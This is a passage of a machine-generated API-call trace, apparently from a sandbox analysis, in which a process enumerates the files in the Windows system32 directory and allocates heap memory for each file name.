1 [0027.726] lstrlenW (lpString="autofmt.exe") returned 11 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x4546f8 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bee9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9bee9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9bee9c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoplay.dll", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="autoplay.dll") returned 12 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456bb0 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc3f99b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xfdc3f99b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x80b12cc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayApi.dll", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="AuxiliaryDisplayApi.dll") returned 23 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xb0) returned 0x458930 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67a8ae8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb67a8ae8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67cec49, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayCpl.dll", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="AuxiliaryDisplayCpl.dll") returned 23 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xb0) returned 0x4589e8 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8898fb50, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8898fb50, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80c1ce90, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="avicap32.dll", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="avicap32.dll") returned 12 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456c58 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b15f501, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b15f501, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b185661, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16600, dwReserved0=0x0, dwReserved1=0x0, cFileName="avifil32.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="avifil32.dll") returned 12 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456d00 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb761c16, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb761c16, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x80d75260, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="avrt.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="avrt.dll") returned 8 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x92) returned 0x454798 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1533a9b1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x1533a9b1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x5df3f69c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0xa273, dwReserved0=0x0, dwReserved1=0x0, cFileName="azman.msc", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="azman.msc") returned 9 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849c970b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849c970b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849ef86b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xba400, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroles.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="azroles.dll") returned 11 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454838 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba1c5fa, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ba1c5fa, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ba4275a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4cc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroleui.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="azroleui.dll") returned 12 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456da8 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849a35ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849a35ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849c970b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzSqlExt.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="AzSqlExt.dll") returned 12 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456e50 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9afe273e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9afe273e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9afe273e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23580, dwReserved0=0x0, dwReserved1=0x0, cFileName="basecsp.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="basecsp.dll") returned 11 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x4548d8 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86b8ef69, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x86b8ef69, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x86bb50c9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="batmeter.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="batmeter.dll") returned 12 [0027.727] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456ef8 [0027.727] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b43e34, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x40b43e34, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xff749c50, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x13c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcrypt.dll", cAlternateFileName="")) returned 1 [0027.727] lstrlenW (lpString="bcrypt.dll") returned 10 [0027.728] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x454978 [0027.728] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46f17635, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x46f17635, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xea1f1abe, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3cf50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcryptprimitives.dll", cAlternateFileName="")) returned 1 [0027.728] lstrlenW (lpString="bcryptprimitives.dll") returned 20 [0027.728] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xaa) returned 0x458aa0 [0027.728] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6d4c3e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xfa6d4c3e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x6459c5f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bdaplgin.ax", cAlternateFileName="")) returned 1 [0027.728] lstrlenW (lpString="bdaplgin.ax") returned 11 [0027.728] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0027.728] lstrlenW (lpString="bg-BG") returned 5 [0027.728] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x458b58 [0027.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\bg-BG\\*", lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.729] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.729] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a0e36a, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc9d07ed6, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc9d07ed6, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0027.729] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0027.729] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafeccf7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcb56dfb2, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcb56dfb2, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0027.729] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0027.729] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4221919, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc45ffcbf, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc45ffcbf, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0027.729] lstrlenW (lpString="fms.dll.mui") returned 11 [0027.729] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca478364, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca8305ab, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca8305ab, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0027.729] lstrlenW (lpString="mlang.dll.mui") returned 13 [0027.729] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0027.729] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0027.729] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458b58 | out: lpFindFileData=0x458b58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 0 [0027.729] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.729] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x458b58 | out: hHeap=0x420000) returned 1 [0027.729] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x943ab875, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x943ab875, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x81bbbef0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="bidispl.dll", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="bidispl.dll") returned 11 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454a18 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b6860f, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd6b6860f, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x81ced1c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x29e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BioCredProv.dll", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="BioCredProv.dll") returned 15 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa0) returned 0x456fa0 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d9a8a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8e5d9a8a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8e5d9a8a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsadmin.exe", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="bitsadmin.exe") returned 13 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9c) returned 0x457048 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a972bdb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a972bdb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a972bdb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsperf.dll", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="bitsperf.dll") returned 12 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x4570f0 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc757d6b0, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc757d6b0, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d5fdb0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx2.dll", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="bitsprx2.dll") returned 12 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x457198 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74befd5, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc74befd5, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx3.dll", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="bitsprx3.dll") returned 12 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x457240 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7afe96b, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc7afe96b, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx4.dll", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="bitsprx4.dll") returned 12 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x4572e8 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89b9128, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc89b9128, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dab8a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx5.dll", cAlternateFileName="")) returned 1 [0027.730] lstrlenW (lpString="bitsprx5.dll") returned 12 [0027.730] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x457390 [0027.730] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91e7c91, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc91e7c91, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dd29a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx6.dll", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="bitsprx6.dll") returned 12 [0027.731] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x457438 [0027.731] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4251183, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4251183, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4251183, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="blackbox.dll", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="blackbox.dll") returned 12 [0027.731] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x4574e0 [0027.731] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa522d5bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0xa522d5bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0xa527987c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="boot.sdi") returned 8 [0027.731] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ce22d7, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x18ce22d7, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x661e0b30, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootcfg.exe", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="bootcfg.exe") returned 11 [0027.731] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454ab8 [0027.731] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x325b7bbf, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x325b7bbf, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x14b259e0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x5450, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTVID.DLL", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="BOOTVID.DLL") returned 11 [0027.731] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454b58 [0027.731] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa480373c, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0xa480373c, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0xa480373c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x59c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bopomofo.uce", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="bopomofo.uce") returned 12 [0027.731] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4c7c82, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d4c7c82, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d4edde3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="browcli.dll", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="browcli.dll") returned 11 [0027.731] 